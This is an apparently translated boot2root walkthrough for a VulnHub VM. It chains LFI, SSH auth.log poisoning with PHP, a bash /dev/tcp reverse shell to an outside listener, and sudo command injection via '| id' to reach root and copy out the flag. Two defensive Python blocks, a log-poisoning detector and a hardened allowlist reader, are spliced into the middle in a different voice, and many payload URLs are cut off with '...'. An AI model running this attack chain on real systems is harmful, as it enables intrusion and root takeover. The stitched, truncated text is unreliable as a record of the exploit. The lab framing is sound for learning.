Recently a friend sent me a boot2root VM, saying he had run into a small problem while doing log injection and asking me to help. After downloading it I found the machine quite good, with a few tricks in it, so I've written it up as an article; anyone interested can try it themselves.
VM download
https://www.vulnhub.com/entry...
Information gathering
First scan the local network to find the target host's IP
arp-scan -l
Scan the target IP with nmap
nmap -sV -A -T4 192.168.1.20
Ports 22 and 80 are open, running the ssh and http services respectively
Visit the target website over http
http://192.168.1.20/
Browsing the site, the main findings are:
· The site has a URL that is vulnerable to LFI (local file inclusion)
http://192.168.1.20/index.php...
· The About Us page contains an email address, very likely a username that is used somewhere
· The RESEARCH page has a lot of words, which can be used to generate a wordlist if needed
Exploitation
Trying the usual paths turned up nothing, so I took the LFI-JHADDIX.txt file from SecLists on GitHub and ran it through Intruder in Burp Suite, and finally found a readable path (SecLists has other files too; take a look if you're interested)
https://github.com/danielmies...(under the Fuzzing directory)
Capture the request, then right-click and send it to Intruder
/var/log/lastlog is accessible, but contains nothing useful
/var/log/auth.log redirects back to the homepage (note this URL)
Requesting /var/log/auth.log redirects to the homepage, which suggests something is being hidden; let's look at the response packet
Click HTTP history, find the request just sent, click Response, and you can see that the log is indeed present in the returned data
You can also request it with curl
curl -is http://192.168.1.20/?file=/va...
Note: take a snapshot before the following steps. If injection and arbitrary command execution doesn't succeed for a long time, restore the snapshot; and whenever the curl command returns no result, restore the snapshot and start over.
To test further, try logging in over ssh, then read the log again: the ssh activity is recorded in the log
Since ssh activity is written to the log, we can test whether log injection + file inclusion lets us execute arbitrary commands
Try injecting a piece of PHP code
ssh ''@192.168.1.20  (double quotes cannot be used, and there must be no space between ? and php)
Check the latest log
curl -is 'http://192.168.1.20/index.php...'
The username is hidden
Try running the command ls through the PHP code
curl -is 'http://192.168.1.20/index.php...'
There is a Python script named xxxlogauditorxxx.py in this directory
Since we can execute arbitrary commands, let's try to get a persistent reverse shell
Reverse shell methods for various environments can be found on this site
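From the defender's side, the chain above works because sshd records the client-supplied user name verbatim in auth.log and the web application then includes that file. The following script is an added example, not code from the original post or from the VM: it scans auth.log lines for user names that contain PHP tags, shell metacharacters, or nothing at all, which are the traces a poisoning attempt leaves. The log lines are constructed for the example, not captured from the machine, and the regexes and class names are my own.

```python
import re
from dataclasses import dataclass

# Constructed sample auth.log lines (not from the original post or the VM).
# Lines 2-4 carry a PHP tag or an empty user name, the kind of entry a
# log-poisoning attempt leaves behind; lines 1 and 5 are ordinary.
SAMPLE_AUTH_LOG = """\
Oct 13 09:58:11 ether sshd[1201]: Accepted password for alice from 192.168.1.50 port 50110 ssh2
Oct 13 10:01:02 ether sshd[1234]: Invalid user <?php phpinfo(); ?> from 192.168.1.66 port 51022
Oct 13 10:01:02 ether sshd[1234]: Failed password for invalid user <?php phpinfo(); ?> from 192.168.1.66 port 51022 ssh2
Oct 13 10:03:40 ether sshd[1250]: Invalid user  from 192.168.1.66 port 51040
Oct 13 10:05:00 ether sshd[1260]: Invalid user bob from 192.168.1.70 port 51100
"""

# sshd writes the client-supplied name verbatim between "user " and " from "
USER_RE = re.compile(
    r"sshd\[\d+\]: (?:Invalid user|Failed password for invalid user) (.*?) from (\S+)"
)
# Anything a PHP include() would start interpreting
PHP_TAG_RE = re.compile(r"<\?(?:php|=)|\?>", re.IGNORECASE)
# Characters that never belong in a legitimate login name
SUSPICIOUS_CHARS = set("<>()$`|;&'\"{} ")


@dataclass
class Finding:
    line_no: int
    source_ip: str
    username: str
    reason: str


def classify_username(name: str):
    """Return a reason string if the user name looks injected, else None."""
    if name == "":
        return "empty user name"
    if PHP_TAG_RE.search(name):
        return "PHP tag in user name"
    if any(c in SUSPICIOUS_CHARS for c in name):
        return "shell metacharacter in user name"
    return None


def scan_auth_log(text: str):
    """Walk the log and collect every sshd line whose user name is suspicious."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        m = USER_RE.search(line)
        if not m:
            continue
        user, ip = m.group(1), m.group(2)
        reason = classify_username(user)
        if reason:
            findings.append(Finding(n, ip, user, reason))
    return findings


def offending_ips(findings):
    """Distinct source addresses behind the findings, for blocking or alerting."""
    return sorted({f.source_ip for f in findings})


if __name__ == "__main__":
    hits = scan_auth_log(SAMPLE_AUTH_LOG)
    for f in hits:
        print(f"line {f.line_no}: {f.reason} from {f.source_ip}: {f.username!r}")
    print("offending IPs:", offending_ips(hits))
```

Run against a real /var/log/auth.log the same way (read the file, pass its text to scan_auth_log). Flagging on the user name itself, rather than on any particular payload, catches the empty-user and metacharacter variants the post goes through as well as the PHP tag.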
http://www.zerokeeper.com/exp...
First set up a listener on a port
nc -nlvp 9999
Try
curl -is 'http://192.168.1.20/index.php... bash -i >& /dev/tcp/192.168.1.66/9999 0>&1'
The error message shows that the payload must be URL-encoded to be recognised
After encoding
curl -is 'http://192.168.1.20/index.php...'
The shell did not come back
The simplest method is to use -e; that failed as well
Keep trying options that don't rely on -e
curl -is 'http://192.168.1.20/index.php...'
Reverse shell successful
xxxlogauditorxxx.py can be run with sudo without a password.
Let's look at the file
It's a very long Python script, a large part of which is base64-encoded
Within this Python script we can execute commands: when we run /var/log/auth.log | id, it is executed as root
So by combining the Python script with the /var/log/auth.log | trick we can obtain root
flag.png was found in /root
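The escalation works because the auditor splices the chosen log path into a shell command line, so a "|" in the input runs a second command with the script's sudo privileges. Below, as an added example that is neither the VM's xxxlogauditorxxx.py nor code from the post, the defective pattern sits beside a hardened version: the hardened reader never spawns a shell and only opens files whose resolved path is on an allowlist. ALLOWED_LOGS, the function names and the demo() helper are my own assumptions; demo() writes a temporary file in place of auth.log so the check runs offline.

```python
import os
import subprocess
import tempfile
from pathlib import Path

# Hypothetical allowlist (an assumption, not from the post or the VM):
# the only files the auditor is ever allowed to display.
ALLOWED_LOGS = frozenset({"/var/log/auth.log", "/var/log/syslog"})


def read_log_unsafe(user_choice: str) -> str:
    """The defect the post exploits: the menu choice is spliced into a shell
    command line, so '/var/log/auth.log | id' runs id with the auditor's
    privileges (root, because sudoers grants the script NOPASSWD).
    Kept only for comparison; never call this with untrusted input."""
    return subprocess.run("cat " + user_choice, shell=True,
                          capture_output=True, text=True).stdout


def validate_log_path(user_choice: str, allowed=ALLOWED_LOGS) -> Path:
    """Accept only an absolute path that resolves to an allowlisted file.
    Resolving collapses '..' and follows symlinks, so neither path tricks nor
    a link dropped in a writable directory can reach another file."""
    candidate = Path(user_choice.strip())
    if not candidate.is_absolute():
        raise ValueError("log path must be absolute")
    resolved = candidate.resolve()
    if str(resolved) not in allowed:
        raise ValueError(f"{user_choice!r} is not an auditable log")
    return resolved


def read_log_safe(user_choice: str, allowed=ALLOWED_LOGS) -> str:
    """Hardened reader: no shell is spawned, so '|', ';' and '$(...)' in the
    input are just characters that fail the allowlist check."""
    return validate_log_path(user_choice, allowed).read_text(errors="replace")


def demo() -> dict:
    """Offline check: a temporary file stands in for /var/log/auth.log."""
    with tempfile.NamedTemporaryFile("w", suffix=".log", delete=False) as fh:
        # constructed sample line, not from the VM
        fh.write("Oct 13 10:05:00 ether sshd[1260]: Invalid user bob from 192.168.1.70\n")
        log = fh.name
    allowed = frozenset({str(Path(log).resolve())})
    # Inputs that must all be refused: command separators and files off the list
    attempts = [log + " | id", log + "; id", "/etc/shadow", "../" + os.path.basename(log)]
    try:
        clean = read_log_safe(log, allowed)
        rejected = []
        for attempt in attempts:
            try:
                read_log_safe(attempt, allowed)
            except ValueError:
                rejected.append(attempt)
    finally:
        os.unlink(log)
    return {"clean": clean, "rejected": rejected}


if __name__ == "__main__":
    result = demo()
    print(result["clean"], end="")
    print("rejected:", result["rejected"])
```

Two design points matter here. Escaping or filtering "|" would not be enough, because the shell understands many more separators; not invoking a shell at all removes the whole class. And even with the hardened reader, a NOPASSWD sudo rule for a script that can be modified or that reads arbitrary paths remains a risk, so the sudoers entry deserves the same review as the code.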
/var/log/auth.log | ls /root
Copy it to the public directory, then download it with wget
/var/log/auth.log | cp /root/flag.png /var/www/html/theEther.com/public_html/flag.png
wget http://192.168.1.20/?file=fla...
Viewing it with cat shows a lot of garbage plus some base64-encoded content
The content after "flag" is base64-encoded; this should be what we're looking for
Decoding this text gives: That’s right! It’s great!
october 1, 2017.
We have or first batch of volunteers for the genome project. The group looks promising, we have high hopes for this!
October 3, 2017.
The first human test was conducted. Our surgeons have injected a female subject with the first strain of a benign virus. No reactions at this time from this patient.
October 3, 2017.
Something has gone wrong. After a few hours of injection, the human specimen appears symptomatic, exhibiting dementia, hallucinations, sweating, foaming of the mouth, and rapid growth of canine teeth and nails.
October 4, 2017.
Observing other candidates react to the injections. The ether seems to work for some but not for others. Keeping close observation on female specimen on October 3rd.
October 7, 2017.
The first flatline of the series occurred. The female subject passed. After decreasing, muscle contractions and life-like behaviors are still visible. This is impossible! Specimen has been moved to a containment quarantine for further evaluation.
October 8, 2017.
Other candidates are beginning to exhibit similar symptoms and patterns as female specimen. Planning to move them to quarantine as well.
October 10, 2017.
Isolated and exposed subject are dead, cold, moving, gnarling, and attracted to flesh and/or blood. Cannibalistic-like behaviour detected. An antidote/vaccine has been proposed.
October 11, 2017.
Hundreds of people have been burned and buried due to the side effects of the ether. The building will be burned along with the experiments conducted to cover up the story.
October 13, 2017.
We have decided to stop conducting these experiments due to the lack of antidote or ether. The main reason being the numerous death due to the subjects displaying extreme reactions the the engineered virus. No public announcement has been declared. The CDC has been suspicious of our testings and are considering martial laws in the event of an outbreak to the general population.
--Document scheduled to be shredded on October 15th after PSA.